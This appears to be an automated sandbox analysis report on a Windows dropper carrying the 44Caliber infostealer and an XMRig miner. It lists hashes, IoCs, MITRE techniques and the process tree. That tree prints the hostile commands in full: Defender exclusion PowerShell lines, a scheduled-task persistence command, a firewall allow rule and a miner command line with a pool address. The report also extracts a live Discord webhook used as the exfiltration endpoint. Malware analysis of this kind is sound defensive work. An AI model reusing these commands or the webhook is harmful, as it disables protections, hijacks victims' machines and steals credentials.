44caliber | e2d81a70b783df979b49f9caf84b20076533e37068b2db60e6d589eec5bacee4

Analysis

max time kernel
4294221s
max time network
172s
platform
windows7_x64
resource
win7-20220310-en
submitted
20-03-2022 05:19

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

86523374.exe
Size

5.2MB
MD5

23c2521d2d7f41cdc515db9c7a7d6dcb
SHA1

ba422cc6f49b1639d35d61ea9ddec24149649929
SHA256

e2d81a70b783df979b49f9caf84b20076533e37068b2db60e6d589eec5bacee4
SHA512

486ce40687b16f67d8f1473ecc31aadd979fff43bc836b48d502efcf5eb91e1de60f3e47c0e1df0592b17bf7992016c13534fdd2c5afb2b3f1f4482262340bfa

Score

10^/10

44caliber xmrig evasion miner persistence spyware stealer

Malware Config

Extracted

Family

44caliber

https://discordapp.com/api/webhooks/934716186313240606/NIuB64dK4IPafrX9FRy2wNNRrBnOxvdLjio6Ou2fEKxC9HrdYgZQcnvkOx-a4O9pNzdW

Signatures

44Caliber
An open source infostealer written in C#.
stealer 44caliber
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner Payload 11 IoCs

miner

Processes:

resource	yara_rule
behavioral1/memory/1640-140-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/1640-142-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/1640-144-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/1640-146-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/1640-148-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/1640-150-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/1640-152-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/1640-154-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/1640-156-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/1640-158-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/1640-160-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig

Executes dropped EXE 6 IoCs

Processes:

KLNR.exeInsidious2.exeGTAHACK.exeserver.exeservices64.exesihost64.exe

pid process

948 KLNR.exe
1036 Insidious2.exe
828 GTAHACK.exe
752 server.exe
1556 services64.exe
1576 sihost64.exe
Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031

Drops startup file 2 IoCs

Processes:

server.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c8a9da7fa674aa389aad9af7feb5a543.exe	server.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c8a9da7fa674aa389aad9af7feb5a543.exe	server.exe

Loads dropped DLL 8 IoCs

Processes:

86523374.exeKLNR.execmd.execonhost.exe

pid process

1752 86523374.exe
1752 86523374.exe
1752 86523374.exe
1752 86523374.exe
948 KLNR.exe
948 KLNR.exe
812 cmd.exe
1124 conhost.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

pid	process
1752	86523374.exe
1752	86523374.exe
1752	86523374.exe
1752	86523374.exe
948	KLNR.exe
948	KLNR.exe
812	cmd.exe
1124	conhost.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

server.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Windows\CurrentVersion\Run\c8a9da7fa674aa389aad9af7feb5a543 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\server.exe\" .."	server.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\c8a9da7fa674aa389aad9af7feb5a543 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\server.exe\" .."	server.exe

Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

4 freegeoip.app
5 freegeoip.app

flow	ioc
4	freegeoip.app
5	freegeoip.app

Drops file in System32 directory 8 IoCs

Processes:

powershell.execonhost.exepowershell.exepowershell.execonhost.exepowershell.exe

description	ioc	process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File created	C:\Windows\system32\Microsoft\Libs\sihost64.exe	conhost.exe
File created	C:\Windows\system32\Microsoft\Libs\WR64.sys	conhost.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File created	C:\Windows\system32\services64.exe	conhost.exe
File opened for modification	C:\Windows\system32\services64.exe	conhost.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 16 IoCs

Processes:

KLNR.exeserver.exe

pid	process
948	KLNR.exe
948	KLNR.exe
948	KLNR.exe
948	KLNR.exe
948	KLNR.exe
948	KLNR.exe
948	KLNR.exe
752	server.exe
752	server.exe
752	server.exe
752	server.exe
752	server.exe
752	server.exe
752	server.exe
752	server.exe
752	server.exe

Suspicious use of SetThreadContext 1 IoCs

Processes:

conhost.exe

description pid process target process

PID 1124 set thread context of 1640 1124 conhost.exe explorer.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

1656 1640 WerFault.exe explorer.exe

description	pid	process	target process
PID 1124 set thread context of 1640	1124	conhost.exe	explorer.exe

pid	pid_target	process	target process
1656	1640	WerFault.exe	explorer.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

Insidious2.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0	Insidious2.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	Insidious2.exe

Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

740 schtasks.exe

pid	process
740	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

Insidious2.execonhost.exepowershell.exepowershell.execonhost.exepowershell.exeserver.exepowershell.exe

pid	process
1036	Insidious2.exe
1036	Insidious2.exe
1852	conhost.exe
1036	Insidious2.exe
908	powershell.exe
1372	powershell.exe
1124	conhost.exe
1124	conhost.exe
1828	powershell.exe
752	server.exe
752	server.exe
752	server.exe
752	server.exe
752	server.exe
752	server.exe
752	server.exe
752	server.exe
752	server.exe
752	server.exe
752	server.exe
752	server.exe
1704	powershell.exe
752	server.exe
752	server.exe
752	server.exe
752	server.exe
752	server.exe
752	server.exe
752	server.exe
752	server.exe
752	server.exe
752	server.exe
752	server.exe
752	server.exe
752	server.exe
752	server.exe
752	server.exe
752	server.exe
752	server.exe
752	server.exe
752	server.exe
752	server.exe
752	server.exe
752	server.exe
752	server.exe
752	server.exe
752	server.exe
752	server.exe
752	server.exe
752	server.exe
752	server.exe
752	server.exe
752	server.exe
752	server.exe
752	server.exe
752	server.exe
752	server.exe
752	server.exe
752	server.exe
752	server.exe
752	server.exe
752	server.exe
752	server.exe
752	server.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

server.exe

pid process

752 server.exe

pid	process
752	server.exe

Suspicious use of AdjustPrivilegeToken 24 IoCs

Processes:

Insidious2.execonhost.exepowershell.exepowershell.execonhost.exepowershell.exeserver.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	1036	Insidious2.exe
Token: SeDebugPrivilege	1852	conhost.exe
Token: SeDebugPrivilege	908	powershell.exe
Token: SeDebugPrivilege	1372	powershell.exe
Token: SeDebugPrivilege	1124	conhost.exe
Token: SeDebugPrivilege	1828	powershell.exe
Token: SeDebugPrivilege	752	server.exe
Token: SeDebugPrivilege	1704	powershell.exe
Token: 33	752	server.exe
Token: SeIncBasePriorityPrivilege	752	server.exe
Token: 33	752	server.exe
Token: SeIncBasePriorityPrivilege	752	server.exe
Token: 33	752	server.exe
Token: SeIncBasePriorityPrivilege	752	server.exe
Token: 33	752	server.exe
Token: SeIncBasePriorityPrivilege	752	server.exe
Token: 33	752	server.exe
Token: SeIncBasePriorityPrivilege	752	server.exe
Token: 33	752	server.exe
Token: SeIncBasePriorityPrivilege	752	server.exe
Token: 33	752	server.exe
Token: SeIncBasePriorityPrivilege	752	server.exe
Token: 33	752	server.exe
Token: SeIncBasePriorityPrivilege	752	server.exe

Suspicious use of SetWindowsHookEx 2 IoCs

Processes:

KLNR.exeserver.exe

pid process

948 KLNR.exe
752 server.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

86523374.exeGTAHACK.execonhost.execmd.execmd.exeKLNR.execmd.exeserver.exeservices64.execonhost.execmd.exe

description	pid	process	target process
PID 1752 wrote to memory of 948	1752	86523374.exe	KLNR.exe
PID 1752 wrote to memory of 948	1752	86523374.exe	KLNR.exe
PID 1752 wrote to memory of 948	1752	86523374.exe	KLNR.exe
PID 1752 wrote to memory of 948	1752	86523374.exe	KLNR.exe
PID 1752 wrote to memory of 1036	1752	86523374.exe	Insidious2.exe
PID 1752 wrote to memory of 1036	1752	86523374.exe	Insidious2.exe
PID 1752 wrote to memory of 1036	1752	86523374.exe	Insidious2.exe
PID 1752 wrote to memory of 1036	1752	86523374.exe	Insidious2.exe
PID 1752 wrote to memory of 828	1752	86523374.exe	GTAHACK.exe
PID 1752 wrote to memory of 828	1752	86523374.exe	GTAHACK.exe
PID 1752 wrote to memory of 828	1752	86523374.exe	GTAHACK.exe
PID 1752 wrote to memory of 828	1752	86523374.exe	GTAHACK.exe
PID 828 wrote to memory of 1852	828	GTAHACK.exe	conhost.exe
PID 828 wrote to memory of 1852	828	GTAHACK.exe	conhost.exe
PID 828 wrote to memory of 1852	828	GTAHACK.exe	conhost.exe
PID 828 wrote to memory of 1852	828	GTAHACK.exe	conhost.exe
PID 1852 wrote to memory of 1044	1852	conhost.exe	cmd.exe
PID 1852 wrote to memory of 1044	1852	conhost.exe	cmd.exe
PID 1852 wrote to memory of 1044	1852	conhost.exe	cmd.exe
PID 1044 wrote to memory of 908	1044	cmd.exe	powershell.exe
PID 1044 wrote to memory of 908	1044	cmd.exe	powershell.exe
PID 1044 wrote to memory of 908	1044	cmd.exe	powershell.exe
PID 1852 wrote to memory of 1080	1852	conhost.exe	cmd.exe
PID 1852 wrote to memory of 1080	1852	conhost.exe	cmd.exe
PID 1852 wrote to memory of 1080	1852	conhost.exe	cmd.exe
PID 1080 wrote to memory of 740	1080	cmd.exe	schtasks.exe
PID 1080 wrote to memory of 740	1080	cmd.exe	schtasks.exe
PID 1080 wrote to memory of 740	1080	cmd.exe	schtasks.exe
PID 948 wrote to memory of 752	948	KLNR.exe	server.exe
PID 948 wrote to memory of 752	948	KLNR.exe	server.exe
PID 948 wrote to memory of 752	948	KLNR.exe	server.exe
PID 948 wrote to memory of 752	948	KLNR.exe	server.exe
PID 1044 wrote to memory of 1372	1044	cmd.exe	powershell.exe
PID 1044 wrote to memory of 1372	1044	cmd.exe	powershell.exe
PID 1044 wrote to memory of 1372	1044	cmd.exe	powershell.exe
PID 1852 wrote to memory of 812	1852	conhost.exe	cmd.exe
PID 1852 wrote to memory of 812	1852	conhost.exe	cmd.exe
PID 1852 wrote to memory of 812	1852	conhost.exe	cmd.exe
PID 812 wrote to memory of 1556	812	cmd.exe	services64.exe
PID 812 wrote to memory of 1556	812	cmd.exe	services64.exe
PID 812 wrote to memory of 1556	812	cmd.exe	services64.exe
PID 752 wrote to memory of 1472	752	server.exe	netsh.exe
PID 752 wrote to memory of 1472	752	server.exe	netsh.exe
PID 752 wrote to memory of 1472	752	server.exe	netsh.exe
PID 752 wrote to memory of 1472	752	server.exe	netsh.exe
PID 1556 wrote to memory of 1124	1556	services64.exe	conhost.exe
PID 1556 wrote to memory of 1124	1556	services64.exe	conhost.exe
PID 1556 wrote to memory of 1124	1556	services64.exe	conhost.exe
PID 1556 wrote to memory of 1124	1556	services64.exe	conhost.exe
PID 1124 wrote to memory of 1152	1124	conhost.exe	cmd.exe
PID 1124 wrote to memory of 1152	1124	conhost.exe	cmd.exe
PID 1124 wrote to memory of 1152	1124	conhost.exe	cmd.exe
PID 1152 wrote to memory of 1828	1152	cmd.exe	powershell.exe
PID 1152 wrote to memory of 1828	1152	cmd.exe	powershell.exe
PID 1152 wrote to memory of 1828	1152	cmd.exe	powershell.exe
PID 1124 wrote to memory of 1576	1124	conhost.exe	sihost64.exe
PID 1124 wrote to memory of 1576	1124	conhost.exe	sihost64.exe
PID 1124 wrote to memory of 1576	1124	conhost.exe	sihost64.exe
PID 1152 wrote to memory of 1704	1152	cmd.exe	powershell.exe
PID 1152 wrote to memory of 1704	1152	cmd.exe	powershell.exe
PID 1152 wrote to memory of 1704	1152	cmd.exe	powershell.exe
PID 1124 wrote to memory of 1640	1124	conhost.exe	explorer.exe
PID 1124 wrote to memory of 1640	1124	conhost.exe	explorer.exe
PID 1124 wrote to memory of 1640	1124	conhost.exe	explorer.exe

C:\Users\Admin\AppData\Local\Temp\86523374.exe
"C:\Users\Admin\AppData\Local\Temp\86523374.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1752

C:\Users\Admin\AppData\Local\Temp\KLNR.exe
"C:\Users\Admin\AppData\Local\Temp\KLNR.exe"
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:948

C:\Users\Admin\AppData\Local\Temp\server.exe
"C:\Users\Admin\AppData\Local\Temp\server.exe"
3⤵
- Executes dropped EXE
- Drops startup file
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:752

C:\Windows\SysWOW64\netsh.exe
netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
4⤵
PID:1472

C:\Users\Admin\AppData\Local\Temp\Insidious2.exe
"C:\Users\Admin\AppData\Local\Temp\Insidious2.exe"
2⤵
- Executes dropped EXE
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1036

C:\Users\Admin\AppData\Local\Temp\GTAHACK.exe
"C:\Users\Admin\AppData\Local\Temp\GTAHACK.exe"
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:828

C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\GTAHACK.exe"
3⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1852

C:\Windows\System32\cmd.exe
"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
4⤵
- Suspicious use of WriteProcessMemory
PID:1044

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
5⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:908

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
5⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1372

C:\Windows\System32\cmd.exe
"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"
4⤵
- Suspicious use of WriteProcessMemory
PID:1080

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"
5⤵
- Creates scheduled task(s)
PID:740

C:\Windows\System32\cmd.exe
"cmd" cmd /c "C:\Windows\system32\services64.exe"
4⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:812

C:\Windows\system32\services64.exe
C:\Windows\system32\services64.exe
5⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1556

C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "C:\Windows\system32\services64.exe"
6⤵
- Loads dropped DLL
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1124

C:\Windows\System32\cmd.exe
"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
7⤵
- Suspicious use of WriteProcessMemory
PID:1152

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
8⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1828

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
8⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1704

C:\Windows\system32\Microsoft\Libs\sihost64.exe
"C:\Windows\system32\Microsoft\Libs\sihost64.exe"
7⤵
- Executes dropped EXE
PID:1576

C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "/sihost64"
8⤵
PID:552

C:\Windows\explorer.exe
C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=mine.bmpool.org:6004 --user=6238470 --pass=GAMENAME --cpu-max-threads-hint=40 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=5 --cinit-idle-cpu=80 --cinit-stealth
7⤵
PID:1640

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 1640 -s 124
8⤵
- Program crash
PID:1656

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\GTAHACK.exe

MD5
692461c05ba5cfb84d5fcb2bc56adafd

SHA1
c9df2056da3af20175f9ab1942058ef778c438b2

SHA256
1bd4f98c3c59ba62e79448064f48661c2acbc87d85ecd1556f68a3e23a3c2e2c

SHA512
68cef4b8123f1b0c24adbe6f71817b5fa2df3100d112813cfa73b6c0a148717b9f354409cccb941a42ae9e60493bb4dafc2c99318088be8b9416e8a30776bf46

Download Submit
C:\Users\Admin\AppData\Local\Temp\GTAHACK.exe

MD5
692461c05ba5cfb84d5fcb2bc56adafd

SHA1
c9df2056da3af20175f9ab1942058ef778c438b2

SHA256
1bd4f98c3c59ba62e79448064f48661c2acbc87d85ecd1556f68a3e23a3c2e2c

SHA512
68cef4b8123f1b0c24adbe6f71817b5fa2df3100d112813cfa73b6c0a148717b9f354409cccb941a42ae9e60493bb4dafc2c99318088be8b9416e8a30776bf46

Download Submit
C:\Users\Admin\AppData\Local\Temp\Insidious2.exe

MD5
198458bfe3e5de2eb6737beb2d54c292

SHA1
59785684874f6b45205db1f96268593c97485dfe

SHA256
d8657c28223f4e125ba12b4cc56dac08f48e5ef24c7e295f640f281ae456bfca

SHA512
7b10151a06424279cd676f78a61fb0245241fe795b2adb6a930bd331686d4a7843f0abd101c339a3f2c2ec341182b19f47f8e8ab1aaa41338a30d03ecbea5842

Download Submit
C:\Users\Admin\AppData\Local\Temp\Insidious2.exe

MD5
198458bfe3e5de2eb6737beb2d54c292

SHA1
59785684874f6b45205db1f96268593c97485dfe

SHA256
d8657c28223f4e125ba12b4cc56dac08f48e5ef24c7e295f640f281ae456bfca

SHA512
7b10151a06424279cd676f78a61fb0245241fe795b2adb6a930bd331686d4a7843f0abd101c339a3f2c2ec341182b19f47f8e8ab1aaa41338a30d03ecbea5842

Download Submit
C:\Users\Admin\AppData\Local\Temp\KLNR.exe

MD5
8563f76405eb62c0e2a62f57992cb413

SHA1
5f7ff11c5f7be4c15fe6a256f4712e6f98dbd918

SHA256
a9021056e13fa4900943cab8c13718e9b82a55c6605624acc89539d5f7446838

SHA512
e9ba6c5b44eb679bac303dcefb47196cc606a235269da7f58fa352f1b28c3edd6190311a8d79391d81bb71264f55650334edfb78f05a7bdaeee2b220b868b823

Download Submit
C:\Users\Admin\AppData\Local\Temp\server.exe

MD5
8563f76405eb62c0e2a62f57992cb413

SHA1
5f7ff11c5f7be4c15fe6a256f4712e6f98dbd918

SHA256
a9021056e13fa4900943cab8c13718e9b82a55c6605624acc89539d5f7446838

SHA512
e9ba6c5b44eb679bac303dcefb47196cc606a235269da7f58fa352f1b28c3edd6190311a8d79391d81bb71264f55650334edfb78f05a7bdaeee2b220b868b823

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5
42dc9eba47410301406c4e54ad8a114c

SHA1
ec2a755c3901e60fa183cfdb05d409431972d73a

SHA256
96821d8abac10c96ed171bc7158ff9b35a602b53f0da91dd13f0e7b2b7a85ad6

SHA512
a1e21aa88cbec4227b691e4c2bbc33b5e523bb2b210830e1469cde8aca0969b38981f138ada7f48115637d6392fc8c822dd997d9b72d7b45d7f79077900ac36e

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5
42dc9eba47410301406c4e54ad8a114c

SHA1
ec2a755c3901e60fa183cfdb05d409431972d73a

SHA256
96821d8abac10c96ed171bc7158ff9b35a602b53f0da91dd13f0e7b2b7a85ad6

SHA512
a1e21aa88cbec4227b691e4c2bbc33b5e523bb2b210830e1469cde8aca0969b38981f138ada7f48115637d6392fc8c822dd997d9b72d7b45d7f79077900ac36e

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5
364b3ef0a60761c536dee773743ae5a4

SHA1
3d2ec3d184b9d4438870e22f81da729a46db53bc

SHA256
c561ecd0e2448e975e0af302b5c2fa10b0d34ac2be3edb1950eedda7542269f2

SHA512
d9f3d06976b683a8023b94ea66fd51e2e225b6a4d7976cd17bff5e1e89b42b730f91ee07658273d4ea04aab8f86230ef1e1de3ac109cbbdbc0c3eb8be00adf5f

Download Submit
C:\Windows\System32\Microsoft\Libs\sihost64.exe

MD5
943c340e0da33f95572f0beb0fdf875b

SHA1
d1081ddc04e6d52a737386d85a9193b2326ccf7c

SHA256
118a4f9a80ceef768290e81f123246d4adb50785591ff2de9f7cfecd459b5dc9

SHA512
51b8a3c5aaa54d0b4d0f544be2b2b05b1fef82427db0c614df35de8b654331c0150d72ab146f0b6d2e51356620df4ad70afad616fc1edd5d13c5410e25a06cd5

Download Submit
C:\Windows\System32\services64.exe

MD5
692461c05ba5cfb84d5fcb2bc56adafd

SHA1
c9df2056da3af20175f9ab1942058ef778c438b2

SHA256
1bd4f98c3c59ba62e79448064f48661c2acbc87d85ecd1556f68a3e23a3c2e2c

SHA512
68cef4b8123f1b0c24adbe6f71817b5fa2df3100d112813cfa73b6c0a148717b9f354409cccb941a42ae9e60493bb4dafc2c99318088be8b9416e8a30776bf46

Download Submit
C:\Windows\system32\services64.exe

MD5
692461c05ba5cfb84d5fcb2bc56adafd

SHA1
c9df2056da3af20175f9ab1942058ef778c438b2

SHA256
1bd4f98c3c59ba62e79448064f48661c2acbc87d85ecd1556f68a3e23a3c2e2c

SHA512
68cef4b8123f1b0c24adbe6f71817b5fa2df3100d112813cfa73b6c0a148717b9f354409cccb941a42ae9e60493bb4dafc2c99318088be8b9416e8a30776bf46

Download Submit
\??\PIPE\srvsvc

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\??\c:\users\admin\appdata\local\temp\klnr.exe

MD5
8563f76405eb62c0e2a62f57992cb413

SHA1
5f7ff11c5f7be4c15fe6a256f4712e6f98dbd918

SHA256
a9021056e13fa4900943cab8c13718e9b82a55c6605624acc89539d5f7446838

SHA512
e9ba6c5b44eb679bac303dcefb47196cc606a235269da7f58fa352f1b28c3edd6190311a8d79391d81bb71264f55650334edfb78f05a7bdaeee2b220b868b823

Download Submit
\??\c:\users\admin\appdata\local\temp\server.exe

MD5
8563f76405eb62c0e2a62f57992cb413

SHA1
5f7ff11c5f7be4c15fe6a256f4712e6f98dbd918

SHA256
a9021056e13fa4900943cab8c13718e9b82a55c6605624acc89539d5f7446838

SHA512
e9ba6c5b44eb679bac303dcefb47196cc606a235269da7f58fa352f1b28c3edd6190311a8d79391d81bb71264f55650334edfb78f05a7bdaeee2b220b868b823

Download Submit
\Users\Admin\AppData\Local\Temp\GTAHACK.exe

MD5
692461c05ba5cfb84d5fcb2bc56adafd

SHA1
c9df2056da3af20175f9ab1942058ef778c438b2

SHA256
1bd4f98c3c59ba62e79448064f48661c2acbc87d85ecd1556f68a3e23a3c2e2c

SHA512
68cef4b8123f1b0c24adbe6f71817b5fa2df3100d112813cfa73b6c0a148717b9f354409cccb941a42ae9e60493bb4dafc2c99318088be8b9416e8a30776bf46

Download Submit
\Users\Admin\AppData\Local\Temp\Insidious2.exe

MD5
198458bfe3e5de2eb6737beb2d54c292

SHA1
59785684874f6b45205db1f96268593c97485dfe

SHA256
d8657c28223f4e125ba12b4cc56dac08f48e5ef24c7e295f640f281ae456bfca

SHA512
7b10151a06424279cd676f78a61fb0245241fe795b2adb6a930bd331686d4a7843f0abd101c339a3f2c2ec341182b19f47f8e8ab1aaa41338a30d03ecbea5842

Download Submit
\Users\Admin\AppData\Local\Temp\KLNR.exe

MD5
8563f76405eb62c0e2a62f57992cb413

SHA1
5f7ff11c5f7be4c15fe6a256f4712e6f98dbd918

SHA256
a9021056e13fa4900943cab8c13718e9b82a55c6605624acc89539d5f7446838

SHA512
e9ba6c5b44eb679bac303dcefb47196cc606a235269da7f58fa352f1b28c3edd6190311a8d79391d81bb71264f55650334edfb78f05a7bdaeee2b220b868b823

Download Submit
\Users\Admin\AppData\Local\Temp\KLNR.exe

MD5
8563f76405eb62c0e2a62f57992cb413

SHA1
5f7ff11c5f7be4c15fe6a256f4712e6f98dbd918

SHA256
a9021056e13fa4900943cab8c13718e9b82a55c6605624acc89539d5f7446838

SHA512
e9ba6c5b44eb679bac303dcefb47196cc606a235269da7f58fa352f1b28c3edd6190311a8d79391d81bb71264f55650334edfb78f05a7bdaeee2b220b868b823

Download Submit
\Users\Admin\AppData\Local\Temp\server.exe

MD5
8563f76405eb62c0e2a62f57992cb413

SHA1
5f7ff11c5f7be4c15fe6a256f4712e6f98dbd918

SHA256
a9021056e13fa4900943cab8c13718e9b82a55c6605624acc89539d5f7446838

SHA512
e9ba6c5b44eb679bac303dcefb47196cc606a235269da7f58fa352f1b28c3edd6190311a8d79391d81bb71264f55650334edfb78f05a7bdaeee2b220b868b823

Download Submit
\Users\Admin\AppData\Local\Temp\server.exe

MD5
8563f76405eb62c0e2a62f57992cb413

SHA1
5f7ff11c5f7be4c15fe6a256f4712e6f98dbd918

SHA256
